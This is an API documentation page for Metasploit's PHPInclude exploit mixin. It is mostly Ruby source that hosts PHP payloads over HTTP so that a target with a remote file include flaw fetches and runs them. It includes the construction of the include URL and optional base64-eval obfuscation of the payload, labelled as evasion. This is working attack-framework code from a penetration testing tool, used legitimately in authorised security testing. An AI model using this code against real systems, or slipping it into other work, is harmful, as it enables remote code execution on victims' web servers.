Module: Msf::Exploit::Remote::HttpServer::PHPInclude

Includes:
Msf::Exploit::Remote::HttpServer
Defined in:
lib/msf/core/exploit/http/server.rb

Overview

This module provides methods for exploiting PHP scripts by acting as an HTTP server hosting the payload for Remote File Include vulnerabilities.

Instance Method Summary collapse

Methods included from Msf::Exploit::Remote::HttpServer

#add_resource, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_debug, #print_error, #print_line, #print_status, #print_warning, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #srvhost_addr, #start_service, #use_zlib, #vprint_debug, #vprint_error, #vprint_line, #vprint_status, #vprint_warning

Methods included from Auxiliary::Report

#db, #get_client, #get_host, #inside_workspace_boundary?, #mytask, #myworkspace, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from TcpServer

#cleanup, #on_client_close, #on_client_connect, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #ssl, #ssl_cert, #ssl_compression, #start_service, #stop_service

Instance Method Details

#autofilterObject

Since these types of vulns are Stance::Aggressive, override HttpServer's normal non-automatic behaviour and allow things to run us automatically


931
932
933
# File 'lib/msf/core/exploit/http/server.rb', line 931

def autofilter
  true
end

#exploitObject

:category: Exploit::Remote::TcpServer overrides

Override exploit() to handle service start/stop

Disables SSL for the service since we always want to serve our evil PHP files from a non-ssl server. There are two reasons for this:

  1. https is only supported on PHP versions after 4.3.0 and only if the OpenSSL extension is compiled in, a non-default configuration on most systems

  2. somewhat less importantly, the SSL option would conflict with the option for our client connecting to the vulnerable server


948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
# File 'lib/msf/core/exploit/http/server.rb', line 948

def exploit
  old_ssl = datastore["SSL"]
  datastore["SSL"] = false
  start_service
  datastore["SSL"] = old_ssl

  #if (datastore["SRVHOST"] == "0.0.0.0" and Rex::Socket.is_internal?(srvhost_addr))
  #	print_error("Warning: the URL used for the include might be wrong!")
  #	print_error("If the target system can route to #{srvhost_addr} it")
  #	print_error("is safe to ignore this warning. If not, try using a")
  #	print_error("reverse payload instead of bind.")
  #end

  begin
    print_status("PHP include server started.");
    php_exploit
    ::IO.select(nil, nil, nil, 5)
  rescue ::Interrupt
    raise $!
  ensure
    stop_service
  end
end

#initialize(info = {}) ⇒ Object


917
918
919
920
921
922
923
924
925
926
927
# File 'lib/msf/core/exploit/http/server.rb', line 917

def initialize(info = {})

  # Override TCPServer's stance of passive
  super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive))

  register_evasion_options(
    [
      OptEnum.new('PHP::Encode', [false, 'Enable PHP code obfuscation', 'none', ['none', 'base64']]),
    ], Exploit::Remote::HttpServer::PHPInclude
  )
end

#on_request_uri(cli, request, headers = {}) ⇒ Object

:category: Event Handlers

Handle an incoming PHP code request


992
993
994
995
996
997
998
# File 'lib/msf/core/exploit/http/server.rb', line 992

def on_request_uri(cli, request, headers={})
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Send it to the application
  send_php_payload(cli, p.encoded, headers)
end

#php_include_url(sock = nil) ⇒ String

The PHP include URL (pre-encoded)

Does not take SSL into account. For the reasoning behind this, see #exploit.

Returns:

  • (String)

    The URL to be used as the argument in a call to require, require_once, or include or include_once in a vulnerable PHP app.


1009
1010
1011
1012
1013
1014
1015
# File 'lib/msf/core/exploit/http/server.rb', line 1009

def php_include_url(sock=nil)
  host = srvhost_addr
  if Rex::Socket.is_ipv6?(host)
    host = "[#{host}]"
  end
  "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
end

#send_php_payload(cli, body, headers = {}) ⇒ Object

Transmits a PHP payload to the web application


975
976
977
978
979
980
981
982
983
984
985
# File 'lib/msf/core/exploit/http/server.rb', line 975

def send_php_payload(cli, body, headers = {})

  case datastore['PHP::Encode']
  when 'base64'
    body = "<?php eval(base64_decode('#{Rex::Text.encode_base64(body)}'));?>"
  when 'none'
    body = "<?php #{body} ?>"
  end

  send_response(cli, body, headers)
end